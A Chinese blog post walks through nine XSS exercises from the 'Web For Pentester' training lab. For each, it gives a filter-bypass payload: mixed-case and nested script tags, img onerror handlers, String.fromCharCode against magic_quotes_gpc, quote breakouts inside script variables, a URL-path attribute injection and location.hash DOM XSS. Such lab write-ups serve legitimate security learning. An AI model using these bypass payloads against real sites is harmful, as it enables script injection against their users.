专栏首页Urahara BlogWeb For Pentester - XSS Part Tips

Web For Pentester - XSS Part Tips

XSS Example 1

直接输出无任何过滤:

name=<script>alert(/XSS/)</script>

XSS Example 2s

过滤掉了<script>标签,通过大小写进行绕过:

name=<Script>alert(/XSS/)</Script>

XSS Example 3

过滤了<script>标签(包括大写),但只过滤了一次,通过嵌套标签来绕过filter表达式:

name=<s<Script>cript>alert(/XSS/)</sc</Script>ript>

XSS Example 4

使用<script>标签测试直接显示error,替换<img>、<svg>等标签测试成功:

name=<img src=1 onerror=”alert(/XSS/)”>

XSS Example 5

alert被过滤,但prompt、confirm函数可使用;这里同样可以使用String.fromCharCode来绕过:

name=<img src=1 onerror=”confirm(/XSS/)”>

绕过magic_quotes_gpc magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单引号)转换为',”(双引号)转换为" ,\转换为 比如:<script>alert(“xss”);</script>会转换为alert(\"xss\");,这样我们的xss就不生效了。 针对开启了magic_quotes_gpc的网站,我们可以通过javascript中的String.fromCharCode方法来绕过,我们可以把alert(/XSS/);转换为 String.fromCharCode(97, 108, 101, 114, 116, 40, 47, 88, 83, 83, 47, 41)那么我们的XSS语句就变成了 <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script> String.fromCharCode()是javascript中的字符串方法,用来把ASCII转换为字符串,在harkbar中的XSS功能中有这个功能可直接使用

XSS Example 6

F12查看元素,发现输出在script标签中 $a= “hacker”; ,那么直接闭合双引号就好:

name=XSS”;alert($a);//

XSS Example 7

通过Example 6的方法发现双引号被HTML编码了,而且在$a=’‘处添加了单引号来申明变量内容,那么同样依照闭合的原则将双引号改为单引号即可

name=XSS’;alert($a);//

XSS Example 8

查询功能,将查询内容反馈至页面,那么也就是存储型XSS,使用<script>标签进行测试,通过查看源码发现<>尖括号被HTML编码,一般来说XSS漏洞修复若将尖括号进行编码后输出可视为安全的,但发现这里的form表单里的url可为任意构造,尝试访问如下带有payload的url成功 /xss/example8.php/” onmouseover=”alert(1)

XSS Example 9

同样审查元素,发现这里是一个很经典的DOM-Based XSS,使用了location.hash.substring(1),那么直接构造 /xss/example9.php#<script>alert(/XSS/)</script>

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Web For Pentester - Directory traversal & File Include Part Tips

    风流
  • Some Ways To Create An Interactive Shell On Windows

    风流
  • Redis Hacking Tips

    ​ You must know the physical path of the Web site

    风流
  • xss攻击和csrf攻击的定义及区别

    (1)登录受信任网站A,并在本地生成Cookie。(如果用户没有登录网站A,那么网站B在诱导的时候,请求网站A的api接口时,会提示你登录)

    码缘
  • xss攻击和csrf攻击的定义及区别

    (1)登录受信任网站A,并在本地生成Cookie。(如果用户没有登录网站A,那么网站B在诱导的时候,请求网站A的api接口时,会提示你登录)

    卡二条的技术圈子
  • XSS

    XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者...

    河湾欢儿
  • 前端安全之XSS和csrf攻击

    csrf攻击(Cross-site request forgery):跨站请求伪造;

    IT人一直在路上
  • XSS防御指北

    XSS攻击,对于各位黑客大佬应该算是熟悉的不能再熟悉了,但是为了在座的各位吃瓜群众,小编我还是先简单的在此介绍下。XSS攻击全称为跨站脚本攻击,是...

    用户2202688
  • BlueLotus-XSS平台源码分享

    Youngxj
  • 不可忽视的前端安全问题——XSS攻击

    用户1687375

扫码关注云+社区

领取腾讯云代金券